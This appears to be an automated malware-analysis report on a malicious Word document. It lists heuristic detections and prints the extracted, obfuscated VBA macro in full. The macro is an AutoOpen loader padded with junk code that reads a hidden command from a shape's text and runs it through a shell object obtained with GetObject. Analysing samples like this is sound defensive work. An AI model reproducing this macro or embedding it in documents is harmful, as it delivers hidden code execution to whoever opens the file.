MALICIOUS
232
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample contains a VBA macro that is designed to execute a complex command-line payload. This payload appears to be constructing a command that involves setting environment variables and potentially downloading and executing further stages, indicated by the use of cmd.exe and the construction of URLs. The AutoOpen macro and GetObject calls are common indicators of malicious document execution.
Heuristics 9
-
ClamAV: Doc.Malware.Djty-6813878-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Djty-6813878-0
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
End Select Set jQAUS = GetObject(PUQnqP + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JQhvpQbSa) On Error Resume Next -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6871 bytes |
SHA-256: 6ffb361db203ed2701c173dfce983c15fad4b91aff734c0560d416377a443441 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
122 of 183 identifiers look randomly generated (e.g. 'FqEMKKJpKfGA') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FqEMKKJpKfGA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case lJoZc
Case 1940399
qdOHZLSC = 305591436
UotKM = CLng(65501183)
Case 45954295
ujjIOMCT = Oct(TpUKQ)
oQYpEz = BzYtCuNu
Case 159840413
hniTGiOCE = CDate(IwNZz)
UFtoU = Int(18024043 * MfjjVKIF)
End Select
Set qmWiBiiJn = Shapes("vdbnsODhSbV")
On Error Resume Next
Select Case YzOLUdHlp
Case 26455679
cGhLZNSjO = 25765060
rKjEHGMbO = CLng(247713588)
Case 336599014
QckZF = Oct(aKSINiPj)
lVzOp = iIDfQWBY
Case 91445357
MdGRjooN = CDate(otajwBoaF)
FRXKLlU = Int(216496630 * oLYlESBBJ)
End Select
On Error Resume Next
Select Case ovvLiOj
Case 18726238
nLclohJK = 200988989
kISkrhJfw = CLng(133530858)
Case 220638933
MXmSaVk = Oct(QbkqjV)
YbzlPlP = UVLDdYjk
Case 227537735
KwFwV = CDate(oaNfI)
cAWClEz = Int(229888201 * rzsRwP)
End Select
rvPGiiAc = "" + hrCjZWaZ + zpYjWztK + qmWiBiiJn.TextFrame.TextRange.Text + nflzpTB + YrWTVwR + bzcMwGlc
On Error Resume Next
Select Case VfPUSFLHP
Case 189594986
sBVBji = 145608770
ohFjViK = CLng(94026124)
Case 255479588
npuICNCi = Oct(OZCFk)
cUTRlH = ZjiRQwup
Case 48476766
YacnVjzIz = CDate(XHBmbVWtK)
zBYBPKikw = Int(27509132 * RGjdfHXG)
End Select
On Error Resume Next
Select Case urjDnzh
Case 60562675
jBBFnHP = 114872289
qZuYp = CLng(73552098)
Case 172205550
rqUrc = Oct(cEJNkh)
dNGBBwRZM = wUcji
Case 173305467
CYdiIqo = CDate(DkYBdufk)
MLoWnO = Int(58119996 * ipVWAjud)
End Select
On Error Resume Next
Select Case DQLwjCmm
Case 64829509
snwCjWr = 143591654
IuHNArXAE = CLng(102236859)
Case 206223537
OzZGDihR = Oct(YQuHfD)
QvbATZuu = CKELCiXip
Case 197111520
XwfoJDjki = CDate(GVokjI)
iOoDiLBX = Int(190258928 * PpsPR)
End Select
On Error Resume Next
Select Case olNHvLnja
Case 319076753
IMEqUSX = 257630588
QoCWdB = CLng(186524536)
Case 246986478
divKPGskw = Oct(WihazXLpv)
bAXSiaA = rdujCozR
Case 188803652
zwzkTfQpj = CDate(EzSLhK)
cHdboF = Int(61079467 * UznbtcfuN)
End Select
On Error Resume Next
Select Case jzvfFwr
Case 338634345
QQjuh = 196284817
FuEJmn = CLng(169231221)
Case 230424177
UJTXTK = Oct(CSjwqtQ)
XPfhLCAVz = jwkwrta
Case 85055216
lmYcoF = CDate(jbAfYLdM)
WIsXQToV = Int(339681657 * OrGanYdh)
End Select
Set jQAUS = GetObject(PUQnqP + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + JQhvpQbSa)
On Error Resume Next
Select Case UpGDi
Case 228088127
cstiHY = 232007255
TVfciz = CLng(52617072)
Case 341224590
fGiihVikt = Oct(NXYsjaENT)
sbMmpwFj = BGMpI
Case 158478666
DhuWOuO = CDate(WwuczBd)
oRGEusoj = Int(109876329 * irtAhQUEX)
End Select
On Error Resume Next
Select Case oAiFu
Case 284975464
QufCA = 173194604
hiljiVw = CLng(114367316)
Case 169232980
wuZvDL = Oct(kfizSTA)
lhvzdAP = wtrDwLG
Case 59429179
aVJzRKN = CDate(FRVrXOLk)
tnDRwM = Int(216086050 * cCLHcY)
End Select
On Error Resume Next
Select Case WLiIq
Case 337721066
rHuiZUnV = 117623610
jYsda = CLng(233622320)
Case 326322939
RHiCGtEP = Oct(YScKB)
XzAhRFUXM = YvlVX
Case 319197993
jcYrHoA = CDate(ZJMPC)
qfYViaCjZ = Int(328139393 * RAiwSukc)
End Select
Const lHsNXvv = 0
On Error Resume Next
Select Case foqGGTW
Case 92724345
OniPjotp = 334321724
iHTawrC = CLng(243773882)
Case 28638461
iqGmk = Oct(nmmpwYI)
iBwAoMf = nHYPLNtP
Case 22018368
SJKYjrfK = CDate(GCJXF)
uwvvCwrZo = Int(19108255 * OUKZtXmPG)
End Select
On Error Resume Next
Select Case klNVIcfpz
Case 80575398
huKGa = 220792627
PTwbj = CLng(323778506)
Case 214095096
zOPjtjo = Oct(ujRIw)
MkKzmhoiU = FazWAIBQp
Case 224283574
RaOSYtq = CDate(XIYHXG)
RmKzmU = Int(301873316 * iSiREli)
End Select
On Error Resume Next
Select Case uDldj
Case 102791789
knbJdiKIH = 184298026
RkbYdT = CLng(121116308)
Case 296447569
UwShHHUT = Oct(liSjoFm)
XqwqtR = dmIfVZSL
Case 260673037
XoUtCVNr = CDate(VzAhwWmO)
curbffEVz = Int(269322181 * BTTiCRRRV)
End Select
jQAUS.Run@ rvPGiiAc, lHsNXvv
On Error Resume Next
Select Case SIYHLdX
Case 86491394
kIZaaT = 36343733
WGJfHAbM = CLng(254858974)
Case 7473128
ZUkVNcaw = Oct(vJiYzbWn)
WZpvhY = lzLHzu
Case 164962464
qnszmMz = CDate(USoMckhfi)
wQbsdnMJ = Int(179801852 * PqpAkBiK)
End Select
On Error Resume Next
Select Case KzZVdqUN
Case 35830183
utFNCEnL = 253502292
pPHNHdjNb = CLng(33848164)
Case 280190149
HkWVBQV = Oct(JiJAvfM)
DwYUV = wupMN
Case 339930494
GmAqS = CDate(UrhDXpQk)
GHRcRh = Int(61712895 * jVGGmbfo)
End Select
On Error Resume Next
Select Case NfCbBlAf
Case 228044614
RGppzEj = 66677402
rjVXE = CLng(116401169)
Case 333229429
IJnDLBB = Oct(zlAZPW)
ZObkNi = qRPZY
Case 338595728
IzJCMsVvU = CDate(EnYCS)
lkUTvJdh = Int(246159157 * HTWomdBZp)
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.